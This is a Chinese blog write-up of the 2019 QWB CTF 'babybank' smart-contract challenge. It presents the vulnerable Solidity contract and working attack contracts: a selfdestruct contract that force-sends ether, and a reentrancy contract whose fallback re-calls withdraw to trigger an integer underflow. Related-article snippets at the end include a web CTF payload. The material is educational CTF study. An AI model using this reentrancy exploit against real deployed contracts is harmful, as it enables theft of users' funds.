2019 强网杯 babybank

最新推荐文章于 2021-06-16 16:30:36 发布
最新推荐文章于 2021-06-16 16:30:36 发布
阅读量843 收藏 4
点赞数 2
分类专栏: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115599495
版权

前言

开始学习区块链的安全问题,先从这道比较简单的区块链题目入手,学习一波。

WP

源码:

pragma solidity ^0.4.23;

contract babybank {
    mapping(address => uint) public balance;
    mapping(address => uint) public level;
    address owner;
    uint secret;
    
    //Don't leak your teamtoken plaintext!!! md5(teamtoken).hexdigest() is enough.
    //Gmail is ok. 163 and qq may have some problems.
    event sendflag(string md5ofteamtoken,string b64email); 
    
    
    constructor()public{
        owner = msg.sender;
    }
    
    //pay for flag
    function payforflag(string md5ofteamtoken,string b64email) public{
        require(balance[msg.sender] >= 10000000000);
        balance[msg.sender]=0;
        owner.transfer(address(this).balance);
        emit sendflag(md5ofteamtoken,b64email);
    }
    
    modifier onlyOwner(){
        require(msg.sender == owner);
        _;
    }
    
    //challenge 1 
    function profit() public{
        require(level[msg.sender]==0);
        require(uint(msg.sender) & 0xffff==0xb1b1);
        balance[msg.sender]+=1;
        level[msg.sender]+=1;
    }
    
    //challenge 2
    function set_secret(uint new_secret) public onlyOwner{
        secret=new_secret;
    }
    function guess(uint guess_secret) public{
        require(guess_secret==secret);
        require(level[msg.sender]==1);
        balance[msg.sender]+=1;
        level[msg.sender]+=1;
    }
    
    //challenge 3
    
    function transfer(address to, uint amount) public{
        require(balance[msg.sender] >= amount);
        require(amount==2);
        require(level[msg.sender]==2);
        balance[msg.sender] = 0;
        balance[to] = amount;
    }
    
    function withdraw(uint amount) public{
        require(amount==2);
        require(balance[msg.sender] >= amount);
        msg.sender.call.value(amount*100000000000000)();
        balance[msg.sender] -= amount;
    }
}

目前我还不知道区块链的题目应该怎么复现,所以在本地Remix上试的时候就去除了得到flag的代码和一部分代码,只保留在本地可以复现成功的代码。
代码不算长,大致看一下,想要得到flag需要balance[msg.sender] >= 10000000000,而且差不多有3个challenge,首先是这个:

    function profit() public{
        require(level[msg.sender]==0);
        require(uint(msg.sender) & 0xffff==0xb1b1);
        balance[msg.sender]+=1;
        level[msg.sender]+=1;
    }

&是相同为0,不同为1,因此这部分要求msg.sender以0xb1b1结尾,第一次做区块链的题目确实没啥思维了,接下来就是从大师傅们的WP上学习东西。
有这么一个网站,可以生成指定前缀或者后缀的ETC地址账号:
https://vanity-eth.tk/
因此先利用这个工具生成个账号,再去profit函数就可以了:
在这里插入图片描述

然后就是这里:

    function set_secret(uint new_secret) public onlyOwner{
        secret=new_secret;
    }
    function guess(uint guess_secret) public{
        require(guess_secret==secret);
        require(level[msg.sender]==1);
        balance[msg.sender]+=1;
        level[msg.sender]+=1;
    }

说白了就是需要传的guess_secret和owner传的new_secret一样。又学习到了,就是去看合约的交易信息:
在这里插入图片描述
注意到下面的Input Data的参数,非常的眼熟了,就是我昨天刚学习的函数选择器及参数编码那部分的知识。
本地复现一下就可以知道:

 bytes4 public selector1= bytes4(this.set_secret.selector);

在这里插入图片描述
前面的0x8e2a219e就是函数签名了,因此后面的000000000000000000000000000000000000000000000000000000000001e240就是传入的参数经过编码后的结果,因为是uint256类型,因此直接1e240进行16进制解码就得到123456(这里是我本地复现的,所以就是模拟输入了个值)。
在这里插入图片描述

在这里插入图片描述

然后就到了最终的利用处了:

    function transfer(address to, uint amount) public{
        require(balance[msg.sender] >= amount);
        require(amount==2);
        require(level[msg.sender]==2);
        balance[msg.sender] = 0;
        balance[to] = amount;
    }
    
    function withdraw(uint amount) public{
        require(amount==2);
        require(balance[msg.sender] >= amount);
        msg.sender.call.value(amount*100000000000000)();
        balance[msg.sender] -= amount;
    }

关键的漏洞函数就是withdraw这个函数,需要amount为2,而且当前账号的余额要大于等于2。这样就会触发这两行代码:

msg.sender.call.value(amount*100000000000000)();
balance[msg.sender] -= amount;

一行是重入攻击,一行是整形下溢出。首先是call那里利用重入攻击,如果msg.sender本身就是一个合约的话,在转账的时候会调用那个合约的fallback函数。
这时候如果构造一个恶意的合约,在它的fallback函数里面再次调用一次题目中的withdray函数,这样就相当于调用了2次withdraw,经过了2次balance[msg.sender] -= amount;。第一次是2-2,第二次是0-2,实现整形下溢出,变成很大的一个数字,这样就可以实现balance[msg.sender] >= 10000000000

还有一个问题就是,题目的合约本身是没有ETH的,因此也就是说没法调用call。因此需要我们给合约转钱才行。但是代码里并没有可以赚钱的函数,这里又学到一点,利用自杀函数来帮助我们强制转账。

我们知道selfdestruct(0xd630cb8c3bbfd38d1880b8256ee06d168ee3859c);语句可以帮助我们销毁合并并将合约中的钱全部转到括号中的地址内。

因此可以利用这种销毁合约的方式来强制转账。
写个合约:

contract feng {
    function kill() public payable {
        selfdestruct(address(0x3E44E3d7Ecf4500179a132B8dD3FeC182Ed4a1F4));
    }
    constructor() public payable{
        
    }
    
}

在deploy的时候向它转0.3ETH。
在这里插入图片描述

然后销毁。就可以强制向那个合约里转0.3ETH。(其实0.2也行)
接着就连着上面的,写个攻击合约:

pragma solidity ^0.4.24;


contract feng {
    function kill() public payable {
        selfdestruct(address(0x3E44E3d7Ecf4500179a132B8dD3FeC182Ed4a1F4));
    }
    constructor() public payable{
        
    }
    
}
interface BabybankInterface {
    function withdraw(uint256 amount) external;
    function profit() external;
    function guess(uint256 number) external;
    function transfer(address to, uint256 amount) external;
    function payforflag(string md5ofteamtoken, string b64email) external;
}
contract attack {
    BabybankInterface private bank = BabybankInterface(0x3E44E3d7Ecf4500179a132B8dD3FeC182Ed4a1F4);
    bool flag = false;
    function() external payable{
        require(flag==false);
        flag=true;
        bank.withdraw(2);
    }
    function att() public {
        bank.withdraw(2);
    }
}

攻击之前,利用b1b1结尾的那个账号调用transfer函数,把2块钱转到我们这个攻击合约上。
然后攻击合约再调用att:
在这里插入图片描述
调用完之后再看一下账号的余额,发现下溢出成功:
在这里插入图片描述
然后再调用payforflag就可以了(因为是本地复现,就没考虑后面这些了)。

bfengj
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF技能宝典之智能合约#重入漏洞
m0_37598434的博客
12-31 711
前言 近年来,各个大型CTF(Capture The Flag,中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式)比赛中都有了区块链攻防的身影,而且出现的题目绝大多数都是区块链智能合约攻防。此系列文章我们主要以智能合约攻防为中心,来剖析智能合约攻防的要点,前两篇我们分享了合约反编译,反汇编的基础内容。后续的文章中,我们会继续分享CTF比赛中智能合约常见题型(重入,整数溢出,空投,随机数可控等)及解题思路,相信会给读者带来不一样的收获。 本篇我们先来分享CTF比赛中的重
强网杯2020线上赛部分wp
qq_36495104的博客
08-30 853
WEB Funhash 参考 https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4 exp hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop Web辅助 这题是学弟做出来的@Sn0w33 1.php反序列化时,S会把binary string当做字符 2.__wakeup()当属性个数大于实际属性个数时会跳过__wakeup() 3.字符串逃逸 五个字符\
2020强网杯wp-pwn-babymessage
weixin_45209963的博客
08-27 670
题目质量还不错…就是快二十道pwn实在是吓人… 一开始看到堆还没有free以为是horse of orange就溜了 回头一看40多解… 再仔细一看只是栈溢出…傻了 考点也是常规考点,栈迁移 换取足够的写入长度 然后onegadget完事 老样子一个菜单 leave name 可以往bss段的一个地方写4字节 leave message 之前有一个写入长度判断 当然正常情况写入长度只可以是0x10 重点在leave message里面 有一个栈溢出可以覆盖到saved ebp 于是我们可以先在nam
强网杯2020-dice2cry&baby_crt&bank
CTF小白的博客
08-29 1618
Web2 dice2cry 操作内容: 输入token后抓包 发现这边给我们设置了一些cookie 一看就知道这是一个RSA加密的密文,公钥n以及公钥e的值 然后抓包roll骰子那个界面 发现他会随机返回给我们一个数字,大概是0-2样子 这边发现abi.php有一个备份文件abi.php.bak 拿到这个abi.php的一个后台源码 <?php session_start(); header("Content-type:text/html;charset=utf-8"); $data = json
强网杯2020 Blockchain IPFS
lwq787998189的博客
08-24 661
强网杯2020 Blockchain IPFS 首先观察题干,下载附件后位如下的文本文档。 两张图片分别为pic1.jpg和pic2.jpg。然后pic2给出了文件的sha256sum,pic1被分为6个碎片进行存储,并给了每个碎片的文件哈希。 了解IPFS的人应该知道,IPFS里面文件哈希均以Qm开头。这是因为IPFS采用了MultiHash技术。原理就是在原有哈希值的前面加上sha-256编码(0x12)和32字节的哈希摘要(0x20),并进行base58编码,最终得到Qm开头的哈希地址。因此在本题中
[强网杯 2019]随便注.docx
最新发布
12-18
强网杯
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
强网杯2022 pwn 赛题解析.docx
12-18
强网杯
强网杯2021 Web.zip
12-17
强网杯
【2021强网杯】Write-Up真题PWN和RE部分(强推)
kali_Ma的博客
06-16 1311
前言 不得不说强网的反作弊做的真心不错 re 不一样 真心可以 话不多说,请往下看: baby_diary 参考实现堆块复用,后面就是常规题目 EXP # encoding:utf-8 from pwn import * libc=ELF('./libc-2.31.so') def add(size,data='a'): p.recvuntil('>> ') p.sendline('1') p.recvuntil('ize: ') p.sendline(str(size)) p.
Ethernaut 靶场刷题(上)
feng的博客
04-12 2506
前言 看了一下ctfwiki上的,前面的知识点看起来还算不那么费劲,但是突然就是学个几天就开始上手比赛题属实太难了。。。所以先从简单的区块链靶场刷起,循序渐进,慢慢学习区块链的相关知识。 靶场链接: The Ethernaut Hello Ethernaut 算是新手教程了,具体的前面的一些搭建,还有获取Rinkeby环境下的ETH的方式就不说了,靶场上也都说的比较清楚了。用help()可以得到一些常用的帮助,因为异步的问题,我们需要在函数前面加上await。 contract可以查看合约对象: cont
Solidity中Storage
feng的博客
04-14 2425
插槽(slot) 静态大小的变量(除 映射mapping 和动态数组之外的所有类型)都从位置 0 开始连续放置在 存储storage 中。如果可能的话,存储大小少于 32 字节的多个变量会被打包到一个 存储插槽storage slot 中。 通俗的理解就相当于每个合约都有一个storage,静态大小的变量都会放在其中,从位置0开始,甚至可以举个不太恰当的例子,就是编程语言中的数组,每个数组元素可能就相当于静态变量,依次存在storage(类比数组)中,从索引0开始。但是和数组不同的是,solidity的静态
Solidity中 函数选择器及参数编码
feng的博客
04-09 1985
学习文章 应用二进制接口说明 官方文档中的应用二进制接口部分内容。前面部分摘录自官方文档,主要是对后面参数编码进行学习和理解。 函数选择器 一个函数调用数据的前 4 字节,指定了要调用的函数。这就是某个函数签名的 Keccak 哈希的前 4 字节(高位在左的大端序) (译注:这里的“高位在左的大端序“,指最高位字节存储在最低位地址上的一种串行化编码方式,即高位字节在左)。 这种签名被定义为基础原型的规范表达,基础原型即是函数名称加上由括号括起来的参数类型列表,参数类型间由一个逗号分隔开,且没有空格。 类型
Ethernaut 靶场刷题(下)
feng的博客
04-16 1494
Gatekeeper Two 又学到了新东西。源码: pragma solidity ^0.6.0; contract GatekeeperTwo { address public entrant; modifier gateOne() { require(msg.sender != tx.origin); _; } modifier gateTwo() { uint x; assembly { x := extcodesize(caller()) }
security innovation 靶场刷题(下)(持续更新)
feng的博客
04-25 1154
Heads or Tails function play(bool _heads) external payable ctf{ require(msg.value == cost, "Incorrect Transaction Value"); require(gameFunds >= cost.div(2), "Insufficient Funds in Game Contract"); bytes32 entropy = block
Solidity 逆向分析入门学习
feng的博客
04-18 1147
前言 智能合约学到现在也学了差不多1周了,也接触了一些智能合约常见的攻击手段,跟着网上的文章也学习了很多。但是,学习的文章给的直接都是Solidity的源代码,但是: 智能合约大多数代码不公开源码,公开字节码,所以需要使用逆向工具或者人工进行逆向分析。 因此以后要强迫自己去逆向分析代码,提高自己的智能合约逆向分析能力。 但是一开始看逆向得到的伪代码还是比较迷的,因此跟着网上的一些最基本的入门的文章学习了一下,大致的理解这些逆向得到的伪代码,先有1。只要有了1,接下来就是靠自己不断的学习,不断逆向来提高分
Solidity 重入攻击
feng的博客
04-11 1032
前言 上一篇博客中的babybank就是重入攻击的一道题,做之前学习了一下重入攻击,现在再来总结一下。 漏洞介绍 任何从合约 A 到合约 B 的交互以及任何从合约 A 到合约 B 的 以太币Ether 的转移,都会将控制权交给合约 B。 这使得合约 B 能够在交互结束前回调 A 中的代码。 官方文档里讲的就比较难懂(对于我这样的小白来说),简单来说就是,就是因为: 向以太坊合约账户进行转账,发送Ether的时候,会执行合约账户对应合约代码的回调函数(fallback)。 在以太坊智能合约中,进行转账操作,一
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值